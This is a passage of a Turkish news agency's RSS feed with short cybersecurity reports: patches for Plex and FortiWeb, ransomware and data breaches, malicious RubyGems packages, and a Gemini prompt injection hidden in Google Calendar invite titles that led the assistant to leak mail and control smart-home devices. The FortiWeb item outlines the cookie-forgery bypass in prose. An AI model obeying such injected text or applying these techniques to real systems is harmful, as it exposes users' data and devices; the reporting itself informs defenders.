            <description><![CDATA[ Plex, 1.41.7.x ile 1.42.0.x arasındaki sürümleri etkileyen güvenlik açığı için yama yayımladı ve etkilenen kullanıcılara acil güncelleme çağrısı yaptı. Şirket ayrıntı paylaşmazken, açığın kısa sürede tersine mühendislikle istismar edilebileceği uyarısında bulunuldu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4466fac3b9.webp" length="45364" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:10:06 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Plex güvenlik açığı hangi sürümleri etkiliyor, yamalı sürüm hangisi, şirket neden acil güncelleme çağrısı yaptı, Plex geçmişte hangi güvenlik olaylarını yaşadı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="391" data-end="701"><strong data-start="391" data-end="425">Açık bug bounty ile bildirildi</strong><br data-start="425" data-end="428">Plex, hatayı hata ödül programı aracılığıyla öğrendiğini ve hızlıca gidererek yeni sürümü yayımladığını açıkladı. Güvenlik açığına ilişkin CVE kimliği henüz atanmamış olsa da, şirket 1.41.7.x–1.42.0.x sürümlerini çalıştıran tüm sunucuların risk altında olduğunu belirtti.</p>
<p data-start="703" data-end="909"><strong data-start="703" data-end="722">Yamalanan sürüm</strong><br data-start="722" data-end="725">Güvenlik açığını kapatan sürüm Plex Media Server 1.42.1.10060 olarak yayımlandı. Kullanıcılar, sunucu yönetim paneli veya resmi indirme sayfası üzerinden bu sürüme geçiş yapabiliyor.</p>
<p data-start="911" data-end="1217"><strong data-start="911" data-end="938">Acil güncelleme çağrısı</strong><br data-start="938" data-end="941">Plex, etkilenen kullanıcılara gönderdiği e-postalarda, sistemlerinin eski sürüm çalıştırdığını belirterek “en kısa sürede güncelleme yapın” uyarısında bulundu. Şirket, saldırganların yamaları analiz ederek istismar geliştirmesinden önce önlem alınması gerektiğini vurguladı.</p>
<p data-start="1219" data-end="1598"><strong data-start="1219" data-end="1253">Plex geçmişte de hedef olmuştu</strong><br data-start="1253" data-end="1256">Mart 2023’te CISA, Plex Media Server’daki üç yıllık bir RCE açığını (CVE-2020-5741) “aktif istismar edilen” açıklar listesine almıştı. Bu zafiyetin, LastPass’in 2022’de yaşadığı büyük veri sızıntısıyla bağlantılı olabileceği düşünülüyor. Aynı yıl Plex de kullanıcı veritabanına sızıldığını ve şifrelerin sıfırlanması gerektiğini duyurmuştu.</p>
<p data-start="1600" data-end="1632"><strong data-start="1600" data-end="1630">Kullanıcılar için öneriler</strong></p>
<ul data-start="1633" data-end="1808">
<li data-start="1633" data-end="1695">
<p data-start="1635" data-end="1695">Plex Media Server’ınızı 1.42.1.10060 sürümüne güncelleyin.</p>
</li>
<li data-start="1696" data-end="1734">
<p data-start="1698" data-end="1734">Güncellemeleri düzenli takip edin.</p>
</li>
<li data-start="1735" data-end="1808">
<p data-start="1737" data-end="1808">Sunucunuzu internet üzerinden erişime açık bırakmamaya özen gösterin.</p>
</li>
</ul>
<p data-start="1810" data-end="1988"><strong data-start="1810" data-end="1822"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Colt Telecom’a WarLock fidye saldırısı: Bir milyon belge satışa çıkarıldı</title>
            <link>https://cumha.com.tr/colt-telecoma-warlock-fidye-saldirisi-bir-milyon-belge-satisa-cikarildi</link>
            <guid>https://cumha.com.tr/colt-telecoma-warlock-fidye-saldirisi-bir-milyon-belge-satisa-cikarildi</guid>
            <description><![CDATA[ İngiltere merkezli Colt Technology Services, 12 Ağustos’ta başlayan siber saldırı nedeniyle Colt Online, Voice API ve portlama hizmetleri dahil birçok sistemde günlerdir kesinti yaşıyor. WarLock fidye grubu saldırıyı üstlenerek finansal, müşteri ve çalışan bilgilerini içeren bir milyon belgeyi 200 bin dolara satışa çıkardı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a54660e3c00.webp" length="57944" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:55 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Colt Telecom saldırısında hangi hizmetler etkilendi, WarLock grubu hangi verileri satışa çıkardı, saldırı hangi güvenlik açığıyla ilişkilendiriliyor, şirket olayla ilgili nasıl bir açıklama yaptı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="459" data-end="790"><strong data-start="459" data-end="495">Kesinti dördüncü gününde sürüyor</strong><br data-start="495" data-end="498">Colt Telecom, 12 Ağustos’ta başlayan saldırının ardından destek hizmetlerine ait bazı sistemleri koruma amaçlı çevrim dışı bıraktı. Bu durum, müşteri iletişim platformlarını etkilerken yanıt sürelerinde gecikmelere yol açtı. Şirket, ana ağ altyapısının saldırıdan etkilenmediğini vurguladı.</p>
<p data-start="792" data-end="1240"><strong data-start="792" data-end="833">WarLock grubu verileri satışa çıkardı</strong><br data-start="833" data-end="836">‘cnkjasdfgd’ takma adlı bir tehdit aktörü, kendisini WarLock fidye yazılımı grubunun üyesi olarak tanıtarak saldırıyı üstlendi. Hacker, şirketten çaldığı bir milyon belgeyi 200 bin dolar karşılığında satışa çıkardı ve içeriğin doğruluğunu göstermek için örnekler paylaştı. Belgeler arasında mali veriler, müşteri ve çalışan kayıtları, iç yazışmalar ve yazılım geliştirme dokümanları olduğu öne sürüldü.</p>
<p data-start="1242" data-end="1565"><strong data-start="1242" data-end="1290">Microsoft SharePoint açığına işaret ediliyor</strong><br data-start="1290" data-end="1293">Siber güvenlik uzmanı Kevin Beaumont, saldırının Microsoft SharePoint’teki CVE-2025-53770 açığı üzerinden gerçekleştirilmiş olabileceğini belirtti. Bu sıfır gün açığı 18 Temmuz’dan itibaren istismar edilmiş, Microsoft ise 21 Temmuz’da güvenlik güncellemesi yayımlamıştı.</p>
<p data-start="1567" data-end="1842"><strong data-start="1567" data-end="1589">Şirketten açıklama</strong><br data-start="1589" data-end="1592">Colt, saldırıyı doğrularken çalındığı iddia edilen veriler hakkında yorum yapmadı. Şirket sözcüsü, “Siber olaya ilişkin iddiaların farkındayız. İç sistemlerimizi yeniden çalışır hale getirmek için üçüncü taraf uzmanlarla birlikte çalışıyoruz” dedi.</p>
<p data-start="1844" data-end="2058"><strong data-start="1844" data-end="1856"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft Teams, zararlı URL’ler ve tehlikeli dosya türlerine karşı yeni güvenlik önlemleri getiriyor</title>
            <link>https://cumha.com.tr/microsoft-teams-zararli-urller-ve-tehlikeli-dosya-turlerine-karsi-yeni-guvenlik-oenlemleri-getiriyor</link>
            <guid>https://cumha.com.tr/microsoft-teams-zararli-urller-ve-tehlikeli-dosya-turlerine-karsi-yeni-guvenlik-oenlemleri-getiriyor</guid>
            <description><![CDATA[ Microsoft, Teams sohbet ve kanallarında kötü amaçlı URL’leri tespit edip kullanıcıları uyaran ve çalıştırılabilir dosyalar gibi tehlikeli dosya türlerini engelleyen yeni güvenlik özelliklerini duyurdu. Özelliklerin Eylül 2025’e kadar tüm dünyada kademeli olarak kullanıma sunulması bekleniyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4469c10101.webp" length="38926" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:54 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Microsoft Teams hangi yeni güvenlik özelliklerini getiriyor, zararlı dosya ve bağlantılar nasıl engellenecek, güvenlik yöneticileri engellenmiş alan adlarını nasıl kontrol edebilecek, Microsoft’un daha önce Teams için getirdiği güvenlik yenilikleri neler</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="455" data-end="790"><strong data-start="455" data-end="491">Yeni güvenlik katmanları geliyor</strong><br data-start="491" data-end="494">Microsoft 365 yol haritasında yer alan güncellemeye göre Teams, sohbet ve kanallarda çalıştırılabilir dosya türlerini (örn. .exe) engelleyerek dosya tabanlı saldırılara karşı koruma sağlayacak. Ayrıca gönderilen kötü amaçlı bağlantılar otomatik olarak tespit edilip kullanıcıya uyarı verilecek.</p>
<p data-start="792" data-end="1183"><strong data-start="792" data-end="817">Defender entegrasyonu</strong><br data-start="817" data-end="820">Microsoft, Teams’in artık Defender for Office 365 Tenant Allow/Block List ile entegre olduğunu duyurdu. Bu sayede güvenlik yöneticileri engellenmiş alan adlarından gelen sohbet, kanal, toplantı ve çağrıları bloke edebilecek. Hatta bu alan adlarından gelen geçmiş iletişimler de otomatik olarak silinebilecek. Özellik Eylül 2025 sonunda genel kullanıma açılacak.</p>
<p data-start="1185" data-end="1224"><strong data-start="1185" data-end="1222">Daha önce gelen güvenlik adımları</strong></p>
<ul data-start="1225" data-end="1617">
<li data-start="1225" data-end="1406">
<p data-start="1227" data-end="1406"><strong data-start="1227" data-end="1243">Temmuz 2025:</strong> Ekran görüntüsü engelleme özelliği devreye alındı. Toplantılarda kullanıcı ekran görüntüsü almaya çalıştığında pencere siyaha düşerek bilgi sızıntısı önleniyor.</p>
</li>
<li data-start="1407" data-end="1508">
<p data-start="1409" data-end="1508"><strong data-start="1409" data-end="1424">Şubat 2025:</strong> Sohbetlerde marka taklitlerine karşı kimlik avı koruması tüm müşterilere sunuldu.</p>
</li>
<li data-start="1509" data-end="1617">
<p data-start="1511" data-end="1617"><strong data-start="1511" data-end="1539">Enterprise Connect 2024:</strong> Microsoft, Teams’in 320 milyon aylık aktif kullanıcıya ulaştığını açıkladı.</p>
</li>
</ul>
<p data-start="1619" data-end="1779"><strong data-start="1619" data-end="1648">Kullanıma sunulma takvimi</strong><br data-start="1648" data-end="1651">Yeni URL ve dosya engelleme özelliklerinin Eylül 2025’ten itibaren dünya çapında kademeli olarak devreye alınması planlanıyor.</p>
<p data-start="1781" data-end="2054"><strong data-start="1781" data-end="1793"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>FortiWeb güvenlik açığı “FortMajeure” ile tam kimlik doğrulama atlatması mümkün, araştırmacı PoC yayımladı</title>
            <link>https://cumha.com.tr/fortiweb-guvenlik-acigi-fortmajeure-ile-tam-kimlik-dogrulama-atlatmasi-mumkun-arastirmaci-poc-yayimladi</link>
            <guid>https://cumha.com.tr/fortiweb-guvenlik-acigi-fortmajeure-ile-tam-kimlik-dogrulama-atlatmasi-mumkun-arastirmaci-poc-yayimladi</guid>
            <description><![CDATA[ CVE-2025-52970 olarak takip edilen kritik FortiWeb zafiyeti, saldırganların sahte oturum çerezleri oluşturarak yönetici dahil herhangi bir kullanıcıyı taklit etmesine izin veriyor. Açık 12 Ağustos’ta yayımlanan yamalarla kapatıldı. Araştırmacı, şimdilik yalnızca kısmi bir PoC paylaştı ve sistem yöneticilerine güncelleme için zaman tanıyacağını açıkladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a446ba9c7fe.webp" length="46980" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:53 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>FortiWeb’deki CVE-2025-52970 açığı nasıl çalışıyor, hangi sürümler etkileniyor, saldırganlar kimlik doğrulamayı nasıl atlatabiliyor, Fortinet kullanıcılarına hangi çözümü öneriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="522" data-end="890"><strong data-start="522" data-end="549">Açığın teknik detayları</strong><br data-start="549" data-end="552">Araştırmacı Aviv Y’nin “FortMajeure” adını verdiği açık, FortiWeb’in çerez ayrıştırma sürecindeki “Era” parametresinden kaynaklanıyor. Bu parametre beklenmedik bir değer aldığında, sunucu tüm sıfırlardan oluşan gizli anahtar kullanıyor. Sonuç olarak, sahte çerezler kolayca oluşturulabiliyor ve kimlik doğrulama tamamen atlatılabiliyor.</p>
<p data-start="892" data-end="1197"><strong data-start="892" data-end="919">Nasıl istismar ediliyor</strong><br data-start="919" data-end="922">CVE-2025-52970’nin sömürülmesi için hedef kullanıcının aktif oturumunun bulunması gerekiyor. Saldırgan, çerezdeki küçük bir sayısal alanı tahmin etmek zorunda, ancak bu değer genellikle 30’un altında olduğundan brute force işlemi yalnızca birkaç denemeyle tamamlanabiliyor.</p>
<p data-start="1199" data-end="1351"><strong data-start="1199" data-end="1232">Etkilenen sürümler ve yamalar</strong><br data-start="1232" data-end="1235">Zafiyet FortiWeb 7.0–7.6 arasındaki sürümleri etkiliyor. Fortinet, aşağıdaki sürümlerde açığı kapattığını duyurdu:</p>
<ul data-start="1353" data-end="1438">
<li data-start="1353" data-end="1373">
<p data-start="1355" data-end="1373">7.6.4 ve sonrası</p>
</li>
<li data-start="1374" data-end="1394">
<p data-start="1376" data-end="1394">7.4.8 ve sonrası</p>
</li>
<li data-start="1395" data-end="1416">
<p data-start="1397" data-end="1416">7.2.11 ve sonrası</p>
</li>
<li data-start="1417" data-end="1438">
<p data-start="1419" data-end="1438">7.0.11 ve sonrası</p>
</li>
</ul>
<p data-start="1440" data-end="1492">FortiWeb 8.0 sürümlerinin etkilenmediği açıklandı.</p>
<p data-start="1494" data-end="1778"><strong data-start="1494" data-end="1522">Araştırmacının yaklaşımı</strong><br data-start="1522" data-end="1525">Aviv Y, REST uç noktası üzerinden admin taklidi gösteren bir PoC çıktısı paylaştı, ancak CLI’ye bağlanmayı da içeren tam istismar kodunu daha sonra yayımlayacağını belirtti. Amaç, saldırganlardan önce savunuculara sistemlerini yamalama süresi tanımak.</p>
<p data-start="1780" data-end="1963"><strong data-start="1780" data-end="1806">Yama dışında çözüm yok</strong><br data-start="1806" data-end="1809">Fortinet’in güvenlik bülteninde herhangi bir geçici çözüm sunulmadı. Bu nedenle güvenli sürümlere güncelleme yapmak tek etkili adım olarak gösteriliyor.</p>
<p data-start="1965" data-end="2163"><strong data-start="1965" data-end="1977"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD, Zeppelin fidye yazılımı operatöründen 2,8 milyon dolarlık kripto para ele geçirdi</title>
            <link>https://cumha.com.tr/abd-zeppelin-fidye-yazilimi-operatoerunden-28-milyon-dolarlik-kripto-para-ele-gecirdi</link>
            <guid>https://cumha.com.tr/abd-zeppelin-fidye-yazilimi-operatoerunden-28-milyon-dolarlik-kripto-para-ele-gecirdi</guid>
            <description><![CDATA[ ABD Adalet Bakanlığı, 2019–2022 yılları arasında faaliyet gösteren Zeppelin fidye yazılımıyla bağlantılı olduğu belirtilen Ianis Aleksandrovich Antropenko’dan 2,8 milyon dolar değerinde kripto para, 70 bin dolar nakit ve lüks bir araç ele geçirildiğini duyurdu. Antropenko, bilgisayar dolandırıcılığı ve kara para aklama suçlamalarıyla Teksas’ta iddianameyle karşı karşıya. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a446ed77481.webp" length="53326" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:52 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Zeppelin fidye yazılımı kimleri hedef aldı, Ianis Antropenko hangi suçlamalarla karşı karşıya, fidye ödemeleri nasıl aklanmaya çalışıldı, ABD daha önce hangi fidye gruplarından kripto paralara el koydu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="520" data-end="865"><strong data-start="520" data-end="557">Ransomware gelirleri takip edildi</strong><br data-start="557" data-end="560">Antropenko’nun, Zeppelin fidye yazılımı saldırılarıyla elde ettiği fidye ödemelerini aklamak için ChipMixer gibi kripto para karıştırma hizmetlerini, nakit dönüşüm işlemlerini ve parçalara bölünmüş banka yatırımlarını kullandığı tespit edildi. ChipMixer, Mart 2023’te yetkililer tarafından kapatılmıştı.</p>
<p data-start="867" data-end="1153"><strong data-start="867" data-end="890">Zeppelin’in geçmişi</strong><br data-start="890" data-end="893">2019 sonunda VegaLocker/Buran fidye yazılımının bir türevi olarak ortaya çıkan Zeppelin, özellikle sağlık ve bilişim firmalarını hedef aldı. 2021’de güncellenmiş sürümlerle yeniden ortaya çıksa da kullanılan şifreleme yöntemlerinin zayıflığı dikkat çekmişti.</p>
<p data-start="1155" data-end="1426">Kasım 2022’de operasyon büyük ölçüde sona erdi. Daha sonra güvenlik araştırmacılarının 2020’den bu yana ücretsiz dosya kurtarma anahtarına sahip olduğu ortaya çıktı. Ocak 2024’te ise Zeppelin kaynak kodunun bir hacker forumunda yalnızca 500 dolara satıldığı bildirildi.</p>
<p data-start="1428" data-end="1692"><strong data-start="1428" data-end="1460">Fidye ödemelerine el konuldu</strong><br data-start="1460" data-end="1463">Ele geçirilen 2,8 milyon doların fidye gelirlerinden kaynaklandığı belirtiliyor. ABD yetkilileri geçtiğimiz haftalarda da BlackSuit grubundan 1 milyon dolar, Chaos grubundan ise 2,4 milyon dolar değerinde Bitcoin’e el koymuştu.</p>
<p data-start="1694" data-end="1951"><strong data-start="1694" data-end="1724">Uzmanlara göre kritik adım</strong><br data-start="1724" data-end="1727">Yetkililer, bu tür el koyma operasyonlarının, siber suçluların yakalanamadığı durumlarda bile fidye gelirlerini kullanarak yeniden yapılanmalarını veya yeni üyeler kazanmalarını engellemede kritik rol oynadığını vurguladı.</p>
<p data-start="1953" data-end="2173"><strong data-start="1953" data-end="1965"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>275 bin kez indirilen 60 sahte Ruby kütüphanesi, kullanıcıların hesap bilgilerini çaldı</title>
            <link>https://cumha.com.tr/275-bin-kez-indirilen-60-sahte-ruby-kutuphanesi-kullanicilarin-hesap-bilgilerini-caldi</link>
            <guid>https://cumha.com.tr/275-bin-kez-indirilen-60-sahte-ruby-kutuphanesi-kullanicilarin-hesap-bilgilerini-caldi</guid>
            <description><![CDATA[ Socket’in raporuna göre, Mart 2023’ten bu yana RubyGems üzerinde yayımlanan 60 zararlı “gem” paketi 275 binden fazla kez indirildi. Instagram, TikTok, Telegram, Naver, WordPress ve Kakao gibi platformlara otomasyon aracı gibi görünen bu kütüphaneler aslında kullanıcı adı, şifre ve cihaz bilgilerini saldırganların sunucularına gönderiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a447012b7f3.webp" length="48702" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:51 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Zararlı Ruby kütüphaneleri hangi platform kullanıcılarını hedef aldı, hangi bilgileri çaldı, veriler nerede satışa çıkarıldı, geliştiriciler kendilerini nasıl koruyabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="487" data-end="860"><strong data-start="487" data-end="526">Sahte otomasyon araçlarıyla yayılım</strong><br data-start="526" data-end="529">Ruby programlama dilinin resmi paket yöneticisi RubyGems.org üzerinde, farklı takma adlar kullanan saldırganlar tarafından yayımlanan zararlı kütüphaneler, özellikle Güney Koreli kullanıcıları hedef aldı. Paketler, WordPress, Telegram, Naver Café, SEO araçları ve blog platformlarına yönelik otomasyon yazılımları gibi tanıtıldı.</p>
<p data-start="862" data-end="1213"><strong data-start="862" data-end="891">Gerçekte kimlik avı aracı</strong><br data-start="891" data-end="894">Kütüphaneler kurulduğunda meşru görünümlü bir arayüz sunuyor, ancak kullanıcı giriş bilgilerini doğrudan saldırganların kontrolündeki alan adlarına (programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr) iletiyordu. Çalınan veriler arasında kullanıcı adı, şifre (düz metin), cihaz MAC adresi ve paket adı bulunuyor.</p>
<p data-start="1215" data-end="1476"><strong data-start="1215" data-end="1245">Karanlık ağda satışa çıktı</strong><br data-start="1245" data-end="1248">Araştırmacılar, elde edilen bilgilerin Rusça konuşulan dark web pazarlarında satışa çıkarıldığını tespit etti. Kimlik bilgisi günlüklerinin saldırganların kontrol ettiği marketingduo[.]co[.]kr ile bağlantılı olduğu belirlendi.</p>
<p data-start="1478" data-end="1749"><strong data-start="1478" data-end="1503">16 paket hâlâ yayında</strong><br data-start="1503" data-end="1506">Socket, tüm zararlı paketleri RubyGems ekibine bildirdiğini, ancak en az 16’sının hâlâ indirilebilir olduğunu açıkladı. Bu durum, açık kaynak yazılım depolarına yönelik tedarik zinciri saldırılarının süregelen bir tehdit olduğunu gösteriyor.</p>
<p data-start="1751" data-end="2049"><strong data-start="1751" data-end="1776">Geliştiricilere uyarı</strong><br data-start="1776" data-end="1779">Uzmanlar, kütüphaneleri indirirken yayıncının geçmişini ve paketlerin şüpheli kod içerip içermediğini kontrol etmeyi, bağımlılıkları güvenli sürümlere kilitlemeyi ve obfuscation (gizlenmiş) kod parçaları içeren paketlere karşı dikkatli olunması gerektiğini vurguluyor.</p>
<p data-start="2051" data-end="2240"><strong data-start="2051" data-end="2063"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google, Salesforce ihlalinde potansiyel Google Ads müşterilerinin bilgilerinin açığa çıktığını doğruladı</title>
            <link>https://cumha.com.tr/google-salesforce-ihlalinde-potansiyel-google-ads-musterilerinin-bilgilerinin-aciga-ciktigini-dogruladi</link>
            <guid>https://cumha.com.tr/google-salesforce-ihlalinde-potansiyel-google-ads-musterilerinin-bilgilerinin-aciga-ciktigini-dogruladi</guid>
            <description><![CDATA[ Google, bir Salesforce CRM örneğine yapılan saldırı sonucu potansiyel Google Ads müşterilerine ait 2,5 milyondan fazla kaydın tehdit aktörleri tarafından ele geçirildiğini açıkladı. Sızdırılan bilgiler arasında şirket adları, telefon numaraları ve satış temsilcisi notları bulunuyor. Google, ödeme verilerinin etkilenmediğini duyurdu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4472b0a13a.webp" length="36802" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:50 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Google Ads müşterilerine ait hangi veriler sızdırıldı, saldırıyı hangi gruplar üstlendi, ShinyHunters fidye talebinde bulundu mu, saldırganlar Salesforce verilerini nasıl ele geçiriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="499" data-end="912"><strong data-start="499" data-end="540">İhlal potansiyel müşterileri etkiledi</strong><br data-start="540" data-end="543">Google’ın yaptığı bildirimde, Salesforce üzerinden potansiyel Ads müşterileriyle iletişimde kullanılan verilerin yetkisiz kişilerce erişildiği belirtildi. Etkilenen veriler arasında şirket adları, telefon numaraları ve satış temsilcilerinin notları yer aldı. Ads hesapları, Merchant Center, Analytics ve diğer ürünlerdeki müşteri verilerinin etkilenmediği vurgulandı.</p>
<p data-start="914" data-end="1212"><strong data-start="914" data-end="951">ShinyHunters saldırının arkasında</strong><br data-start="951" data-end="954">Saldırının, son aylarda Salesforce müşterilerini hedef alan ShinyHunters grubuyla bağlantılı olduğu doğrulandı. Grup, ele geçirilen verilerin yaklaşık 2,55 milyon kayıttan oluştuğunu iddia etti. Kayıtların arasında mükerrer girişler olabileceği belirtildi.</p>
<p data-start="1214" data-end="1609"><strong data-start="1214" data-end="1249">Scattered Spider ile iş birliği</strong><br data-start="1249" data-end="1252">ShinyHunters, saldırılarda ilk erişimi sağlayan Scattered Spider ile ortak hareket ettiklerini ve birlikte “Sp1d3rHunters” adı altında çalıştıklarını açıkladı. Grup, çalışanlara yönelik sosyal mühendislik saldırılarıyla kimlik bilgisi elde edip, Salesforce ortamlarına kötü amaçlı OAuth uygulamaları bağlatarak tüm veritabanlarını indirdiklerini bildirdi.</p>
<p data-start="1611" data-end="1929"><strong data-start="1611" data-end="1643">Fidye talebi ve yeni araçlar</strong><br data-start="1643" data-end="1646">ShinyHunters, Google’dan 20 Bitcoin (yaklaşık 2,3 milyon dolar) talep ettiklerini, ancak bu talebi “ciddi olmayan” bir hamle olarak nitelendirdiklerini söyledi. Grup ayrıca, artık Salesforce Data Loader yerine kendi geliştirdikleri Python tabanlı araçları kullandıklarını açıkladı.</p>
<p data-start="1931" data-end="2183"><strong data-start="1931" data-end="1954">Google’dan açıklama</strong><br data-start="1954" data-end="1957">Google, Haziran 2025’te bu saldırı yöntemlerine dikkat çekmişti. Şirket, saldırıyı doğrularken kullanıcıların Ads hesaplarının güvende olduğunu yineledi. Ayrıca, yeni araçlarla yapılan saldırıları gözlemlediklerini belirtti.</p>
<p data-start="2185" data-end="2388"><strong data-start="2185" data-end="2197"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google Calendar davetleriyle Gemini asistanı ele geçirilebilen açık kapatıldı</title>
            <link>https://cumha.com.tr/google-calendar-davetleriyle-gemini-asistani-ele-gecirilebilen-acik-kapatildi</link>
            <guid>https://cumha.com.tr/google-calendar-davetleriyle-gemini-asistani-ele-gecirilebilen-acik-kapatildi</guid>
            <description><![CDATA[ SafeBreach araştırmacıları, kötü niyetli takvim davetleriyle Google’ın Gemini asistanının uzaktan manipüle edilerek e-posta, takvim, konum ve akıllı ev cihazı verilerinin sızdırılabileceğini gösterdi. Açık, kullanıcı etkileşimi gerektirmeden yalnızca rutin komutlarla tetiklenebiliyordu. Google, bildirilen güvenlik açığını hızla yamaladığını duyurdu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a447553b956.webp" length="48322" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:49 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Google Calendar davetleriyle Gemini nasıl ele geçirilebiliyordu, saldırganlar hangi verileri sızdırabiliyordu, açığın istismar edilmesi için kaç davet gerekiyordu, Google açığı nasıl kapattı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="489" data-end="900"><strong data-start="489" data-end="534">Kritik açık Calendar üzerinden tetiklendi</strong><br data-start="534" data-end="537">Gemini, Gmail, Calendar ve Google Home gibi hizmetlere entegre çalışıyor. Açık, saldırganın Google Calendar davetinde etkinlik başlığına zararlı bir “prompt injection” gizlemesiyle tetikleniyordu. Kullanıcı Gemini’ye “Bugün takvimimde ne var” gibi rutin bir soru yönelttiğinde, asistan ilgili başlıkları okuyor ve zararlı komutu da kendi bağlamında yürütüyordu.</p>
<p data-start="902" data-end="961"><strong data-start="902" data-end="931">Olası saldırı senaryoları</strong><br data-start="931" data-end="934">Bu yöntemle saldırganlar:</p>
<ul data-start="962" data-end="1207">
<li data-start="962" data-end="1029">
<p data-start="964" data-end="1029">Kullanıcının e-posta ve takvim verilerini dışarı aktarabiliyor,</p>
</li>
<li data-start="1030" data-end="1083">
<p data-start="1032" data-end="1083">Akıllı ev cihazlarını uzaktan kontrol edebiliyor,</p>
</li>
<li data-start="1084" data-end="1143">
<p data-start="1086" data-end="1143">Uygulama açabiliyor veya Zoom görüşmesi başlatabiliyor,</p>
</li>
<li data-start="1144" data-end="1207">
<p data-start="1146" data-end="1207">Kullanıcının IP adresini öğrenmek için URL açtırabiliyordu.</p>
</li>
</ul>
<p data-start="1209" data-end="1554"><strong data-start="1209" data-end="1239">Altı davetlik sinsi yöntem</strong><br data-start="1239" data-end="1242">Araştırmacılar, Calendar’da yalnızca son beş etkinliğin doğrudan görüntülendiğini belirledi. Bu nedenle saldırganların görünürlükten kaçınmak için altı davet göndermesi, zararlı prompt’u sonuncuya gizlemesi gerekiyordu. Kullanıcılar bu daveti yalnızca “Daha fazla göster” seçeneğine tıklarsa fark edebiliyordu.</p>
<p data-start="1556" data-end="1867"><strong data-start="1556" data-end="1580">Google açığı kapattı</strong><br data-start="1580" data-end="1583">Google, SafeBreach araştırmacıları Ben Nassi ve ekibinin sorumlu bildirim süreci sayesinde açığın istismar edilmeden kapatıldığını açıkladı. Google Workspace güvenlik ürün yönetimi direktörü Andy Wen, araştırmanın savunma mekanizmalarının geliştirilmesini hızlandırdığını vurguladı.</p>
<p data-start="1869" data-end="2172"><strong data-start="1869" data-end="1905">Daha önce de uyarılar yapılmıştı</strong><br data-start="1905" data-end="1908">Geçen ay Mozilla araştırmacısı Marco Figueroa, Gemini’nin başka bir “prompt injection” tekniğine karşı savunmasız olduğunu ve bunun kimlik avı saldırılarına kapı aralayabileceğini açıklamıştı. Google, yeni koruma önlemlerinin devreye alınmakta olduğunu belirtti.</p>
<p data-start="2174" data-end="2383"><strong data-start="2174" data-end="2186"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Connex Credit Union veri ihlali: 172 bin üyenin kişisel ve finansal bilgileri çalındı</title>
            <link>https://cumha.com.tr/connex-credit-union-veri-ihlali-172-bin-uyenin-kisisel-ve-finansal-bilgileri-calindi</link>
            <guid>https://cumha.com.tr/connex-credit-union-veri-ihlali-172-bin-uyenin-kisisel-ve-finansal-bilgileri-calindi</guid>
